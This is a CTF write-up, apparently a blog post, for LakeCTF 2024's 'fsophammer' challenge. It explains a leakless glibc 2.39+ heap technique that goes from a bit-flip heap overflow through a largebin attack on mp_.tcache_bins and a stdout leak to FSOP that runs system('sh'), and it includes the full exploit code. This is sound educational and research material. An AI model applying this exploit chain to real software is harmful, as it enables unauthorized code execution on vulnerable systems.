Leakless Code Execution Technique for libc >= 2.39
Last Sunday, I played LakeCTF with CyKor. We ranked 6th in the academic division and qualified for the finals.
I took the pwn challenges, which were great and had a lot to teach. For fsophammer in particular, the intended writeup presents a leakless technique for achieving arbitrary code execution on the latest libc.
This post describes the technique in detail.
Requirements
The requirements for using the technique are as follows.
- A heap primitive to allocate and free chunks
- A heap primitive to write to a chunk at allocation time
- A heap vulnerability (BOF, UAF, whatever…) that can be used to overwrite a largebin chunk's bk_nextsize with a libc-relative value, which is then used for a largebin attack
  - This may look tricky at first glance, but a simple heap BOF can achieve it by overlapping an unsorted bin chunk with a largebin chunk. (details below)
The exact requirements may be looser or stricter depending on the heap primitives and conditions available, but these are generally attainable and often provided in CTF challenges or real-world binaries.
Exploit Scenario
Based on these requirements, the exploit scenario of this technique is as follows.
- Prepare two pointers to _IO_2_1_stdout_ using partial overwrites on chunks allocated from the unsorted bin
  - Note that overwriting a main_arena value into _IO_2_1_stdout_ may require a 4-bit bruteforce.
- Prepare a largebin chunk, and overwrite its bk_nextsize to &mp_.tcache_bins - 0x20
- Trigger the largebin attack, which overwrites mp_.tcache_bins with a heap pointer, a value far greater than the original one (0x40)
- Abusing the overwritten mp_.tcache_bins, make the allocator use the prepared stdout pointers as tcache entries. Also set tcache->counts for the entry indices of the stdout pointers
- Use the first allocation at stdout to overwrite _flags and _IO_write_base and get a libc leak.
- Use the second allocation to achieve code execution using _wide_data FSOP.
LakeCTF 2024: fsophammer
Now let’s take a look at the challenge.
void menu() {
    puts("1. alloc\n2. free\n3. slam");
    size_t cmd;
    if (get_num("cmd",&cmd, 0)) {
        return;
    }
    switch(cmd) {
        case 1:
            alloc();
            break;
        case 2:
            free_();
            break;
        case 3:
            if (!slammed) {
                slam();
                slammed = 1;
            } else {
                puts("[-] slammed already");
            }
            break;
        default:
            puts("[-] invalid cmd");
            break;
    }
}
Three options are given: alloc, free, and slam.
void alloc() {
    size_t idx;
    size_t sz;
    if(get_num("index",&idx,N_ENTRIES)) {
        return;
    }
    if(get_num("size",&sz,MAX_SZ)) {
        return;
    }
    entries[idx] = malloc(sz);
    get_str(entries[idx],sz);
    printf("alloc at index: %zu\n", idx);
}
void free_() {
    size_t idx;
    if(get_num("index",&idx,N_ENTRIES)) {
        return;
    }
    if(!entries[idx]) {
        return;
    }
    free(entries[idx]);
    entries[idx] = NULL;
}
Alloc and free are ordinary: alloc writes to the chunk at allocation time, and free clears the pointer, so no dangling pointer is left behind.
void slam() {
    size_t idx;
    size_t pos;
    puts("is this rowhammer? is this a cosmic ray?");
    puts("whatever, that's all you'll get!");
    if (get_num("index",&idx,sizeof(*stdin))) {
        return;
    }
    if (idx < 64) {
        puts("[-] invalid index");
        return;
    }
    if (get_num("pos",&pos,8)) {
        return;
    }
    unsigned char byte = ((char*)stdin)[idx];
    unsigned char mask = ((1<<8)-1) & ~(1<<pos);
    byte = (byte & mask) | (~byte & (~mask));
    ((char*)stdin)[idx] = byte;
}
The slam menu flips a single bit in _IO_2_1_stdin_, anywhere from _IO_buf_end (offset 64) to the end of the structure. Since stdin is buffered and its buffer is therefore allocated on the heap, flipping the right bit of _IO_2_1_stdin_._IO_buf_end makes the buffer look larger than it is, which leads to a heap BOF.
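To make the effect of the bit flip concrete, here is a minimal sketch of the arithmetic behind the `slam(65, 3)` call used in the exploit. The heap base, the position of the stdin buffer (right after the 0x290-byte tcache chunk) and its 0x1000-byte length are assumptions chosen for illustration, not values taken from the challenge binary.

```python
# Assumed layout (illustrative): the stdin buffer is the first chunk after the
# tcache chunk and is 0x1000 bytes long. Only the low 12 bits of the heap base
# matter here, and heap bases are page aligned.
HEAP_BASE = 0x555555559000
BUF_BASE = HEAP_BASE + 0x2a0
BUF_END = BUF_BASE + 0x1000

BUF_END_OFFSET = 0x40  # offset of _IO_buf_end inside FILE on x86-64 glibc


def slam(value: int, idx: int, pos: int) -> int:
    """Flip bit `pos` of the byte at struct offset `idx`, like slam() does."""
    byte_in_field = idx - BUF_END_OFFSET  # which byte of _IO_buf_end is hit
    return value ^ (1 << (8 * byte_in_field + pos))


new_end = slam(BUF_END, 65, 3)
print(hex(BUF_END - BUF_BASE), "->", hex(new_end - BUF_BASE))  # 0x1000 -> 0x1800
```

Under these assumptions the flip sets bit 11 of `_IO_buf_end`, so the next refill of the stdin buffer may read 0x800 bytes past the real end of the chunk.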
Now let’s follow the exploit scenario above with these primitives.
Exploit
# => future unsorted bin chunk
alloc(0,0x450,b"")
alloc(3, 10, b"") # consolidation barrier
# => future largebin chunk
alloc(1,0x500,b"A"*(0x60)+p64(0xc0+0x60)+p64(0x20))
alloc(3, 10, b"") # consolidation barrier
First, we allocate two chunks, one destined for the unsorted bin and one for the largebin. Note that a fake chunk header is placed at the proper offset inside the largebin chunk; it will later be used to bypass the security checks on the unsorted bin.
alloc(2, 0x4f0, b"") # used later to trigger largebin attack
free(1)
alloc(1, 0x580, b"") # move previous 1 to largebin
free(0) # move 0 to unsorted bin
Next, we allocate a chunk that will be used later to trigger the largebin attack. Freeing 1 and then allocating a larger chunk moves the previous 1 into the largebin. Then we free 0 to put it into the unsorted bin.
slam(65, 3)
alloc(3,0x420-0x60,b"") # reduce unsorted bin size
p.sendafter(b"> ", b"A"*(0x1458-0x60)+p16(0x91+0x30+0x60))
Slam _IO_2_1_stdin_._IO_buf_end to turn scanf into a heap overflow primitive. Allocating from the unsorted bin chunk before overwriting its size keeps it smaller than the largebin chunk. Then overwrite the size so that the unsorted bin chunk overlaps the largebin chunk.
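The constants in the overflow and in the fake header line up as follows. This is a small sketch that recomputes them from the allocation sizes used in the exploit; `request2size` is a simplified reimplementation of glibc's macro for 64-bit targets, and the three conditions at the end paraphrase the unsorted bin integrity checks (matching `next->prev_size`, a valid next size, and a clear `PREV_INUSE` bit on the next chunk).

```python
def request2size(req: int) -> int:
    """Chunk size glibc picks for malloc(req) on 64-bit targets (simplified)."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


chunk0 = request2size(0x450)        # 0x460, later freed into the unsorted bin
barrier = request2size(10)          # 0x20 consolidation barrier
taken = request2size(0x420 - 0x60)  # 0x3d0 carved off before the overflow
remainder = chunk0 - taken          # 0x90 left in the unsorted bin

forged_size = 0x91 + 0x30 + 0x60    # value written by the overflow
forged_len = forged_size & ~0x7     # 0x120 once the flag bits are masked off

# Distance from the remainder chunk to the fake header inside chunk 1:
# remainder + barrier + chunk 1's own 0x10 header + 0x60 bytes of padding.
fake_header_off = remainder + barrier + 0x10 + 0x60
fake_prev_size, fake_size = 0xc0 + 0x60, 0x20

assert fake_header_off == forged_len             # next chunk is the fake header
assert fake_prev_size == forged_len              # next->prev_size matches
assert fake_size >= 0x10 and not fake_size & 1   # valid size, PREV_INUSE clear
print(hex(remainder), hex(forged_len))
```

The forged chunk therefore ends exactly at the fake header, which is why the padding length of 0x60 appears in both the `alloc(1, ...)` payload and the overwritten size.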
alloc(3,0x20,p64(stdout)[:2]) # tc_idx: 0x2c2
alloc(3,0x20,p64(stdout)[:2]) # tc_idx: 0x2c8
alloc(3,0x50,b"")
alloc(3,0x30,p64(0)+p64(tcache_bins-0x20)[:2])
alloc(3,0x10,b"")
Allocating from the unsorted bin returns a split chunk with a main_arena pointer in it. Overwriting the low 2 bytes of that pointer with those of stdout creates a pointer to stdout within the heap, at the cost of a 4-bit brute force. We prepare 2 pointers to stdout this way.
Next, we overwrite the largebin chunk's bk_nextsize by continuing to split the unsorted bin chunk into the largebin chunk: the main_arena pointer that the split leaves there is partially overwritten to point to &mp_.tcache_bins - 0x20. Finally, we empty the unsorted bin so that the largebin attack can be triggered in the next stage.
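The 4-bit brute force comes from page alignment: the low 12 bits of any libc symbol are fixed, but a 2-byte overwrite also sets bits 12 to 15, which depend on the randomized base. The sketch below illustrates this with a hypothetical offset for `_IO_2_1_stdout_` and a hypothetical base prefix; it also assumes the main_arena pointer and stdout agree on every byte above the low two, which is the best case.

```python
import struct

STDOUT_OFFSET = 0x2045c0  # hypothetical offset of _IO_2_1_stdout_ in libc


def low2(addr: int) -> bytes:
    """Same bytes as pwntools' p64(addr)[:2]."""
    return struct.pack("<Q", addr)[:2]


# The exploit has to commit to one value for bits 12-15; here we guess 0.
guess = low2(STDOUT_OFFSET)

# libc bases are page aligned, so only bits 12-15 of the low 16 bits vary.
hits = [nib for nib in range(16)
        if low2(0x7f0000000000 + (nib << 12) + STDOUT_OFFSET) == guess]
print(len(hits), "of 16 base nibbles match")  # 1 of 16 base nibbles match
```

The same guessed nibble is reused for the `tcache_bins - 0x20` overwrite, so a single successful guess covers all three partial overwrites.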
free(2)
alloc(3,3000,b"") # largebin attack
Freeing the previously allocated 2 moves it to the unsorted bin. Allocating a larger chunk then moves it to the largebin, triggering the largebin attack.
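The write itself happens when glibc inserts a chunk that is smaller than everything already in the largebin: it executes `victim->bk_nextsize->fd_nextsize = victim`, and `fd_nextsize` sits at offset 0x20 of a chunk. The following is a toy model of that branch, using a dictionary as memory; all addresses are made up for illustration.

```python
FD_NEXTSIZE = 0x20  # offset of fd_nextsize from the chunk start
BK_NEXTSIZE = 0x28  # offset of bk_nextsize from the chunk start


def insert_smallest(mem: dict, largest: int, victim: int) -> None:
    """Model of the largebin insertion path taken when victim is the smallest."""
    mem[victim + FD_NEXTSIZE] = largest
    mem[victim + BK_NEXTSIZE] = mem[largest + BK_NEXTSIZE]  # attacker controlled
    target = mem[victim + BK_NEXTSIZE]
    mem[largest + BK_NEXTSIZE] = victim
    mem[target + FD_NEXTSIZE] = victim  # the arbitrary write


TCACHE_BINS = 0x7ffff7e031e8  # hypothetical &mp_.tcache_bins
chunk1 = 0x55555555a700       # hypothetical largebin chunk (index 1)
chunk2 = 0x55555555ac30       # hypothetical chunk being sorted (index 2)

mem = {chunk1 + BK_NEXTSIZE: TCACHE_BINS - 0x20, TCACHE_BINS: 0x40}
insert_smallest(mem, chunk1, chunk2)
print(hex(mem[TCACHE_BINS]))  # 0x55555555ac30
```

This is why the corrupted `bk_nextsize` points 0x20 bytes before the field to be overwritten, and why chunk 2 (0x4f0) is allocated slightly smaller than chunk 1 (0x500).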
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
    && tcache
    && tcache->counts[tc_idx] > 0)
  {
    victim = tcache_get (tc_idx);
    return tag_new_usable (victim);
  }
Since mp_.tcache_bins is now overwritten with a heap address, the tc_idx bound check passes even for very large indices, so it is possible to allocate at our modified stdout pointers.
payload = p64(0xfbad1800)
payload += p64(0)*3
payload += p8(0)
pause()
alloc(3,(0x2c2+1)*0x10, payload)
The distance from tcache->entries to our stdout pointer (index 0x2c2) is converted to the allocation size (0x2c2+1)*0x10. We also need tcache->counts[0x2c2] to be nonzero, but this was already done by the heap overflow payload (b"A"*0x1000+...).
The first allocation at stdout performs the leak.
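The conversion between request size, tcache index and heap offsets can be checked with a few lines. This sketch reimplements `request2size` and `csize2tidx` for 64-bit glibc and assumes the usual layout where `tcache_perthread_struct` starts at heap offset 0x10 with 64 two-byte counters followed by the entries array; the helper `tcache_slots` is a name introduced here for illustration.

```python
TCACHE_MAX_BINS = 64                         # default mp_.tcache_bins (0x40)
COUNTS_SIZE = 2                              # sizeof(uint16_t)
ENTRIES_OFF = TCACHE_MAX_BINS * COUNTS_SIZE  # entries[] starts at 0x80


def request2size(req: int) -> int:
    """Chunk size glibc picks for malloc(req) on 64-bit targets (simplified)."""
    return max((req + 8 + 0xf) & ~0xf, 0x20)


def csize2tidx(csize: int) -> int:
    """tcache index for a chunk size, as in glibc's csize2tidx."""
    return (csize - 0x20 + 0xf) // 0x10


def tcache_slots(idx: int, tcache_off: int = 0x10):
    """Heap offsets of counts[idx] and entries[idx] (assumed struct position)."""
    return tcache_off + COUNTS_SIZE * idx, tcache_off + ENTRIES_OFF + 8 * idx


for idx in (0x2c2, 0x2c8):
    req = (idx + 1) * 0x10
    assert csize2tidx(request2size(req)) == idx
    counts_off, entry_off = tcache_slots(idx)
    print(hex(idx), hex(req), hex(counts_off), hex(entry_off))
# 0x2c2 0x2c30 0x594 0x16a0
# 0x2c8 0x2c90 0x5a0 0x16d0
```

Both counters land at low heap offsets that the overflow padding passes over, which is how the `b"A"` filler doubles as a nonzero `counts` value, and the two entry slots are 0x30 bytes apart, matching the two consecutive 0x20-byte allocations that hold the stdout pointers.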
FSOP = FSOP_struct(
    flags = u64(b"\x01\x01;sh;\x00\x00"),
    lock = struct_ptr + 0x10,
    _IO_read_ptr = 0x0,
    _IO_write_base = 0x0,
    _wide_data = struct_ptr - 0x10,
    _unused2 = p64(libc.symbols['system'])+ b"\x00"*4 + p64(struct_ptr + 196 - 104),
    vtable = libc.symbols['_IO_wfile_jumps'] - 0x20,
)
alloc(3,(0x2c8+1)*0x10, FSOP)
The second allocation triggers system("sh") using the leak.
Conclusion
We got a nice technique to achieve code execution without any leak vulnerability. Big shout out to @skuuk for bringing this great technique and the challenge.
Reference
https://github.com/5kuuk/CTF-writeups/tree/main/tfc-2024/mcguava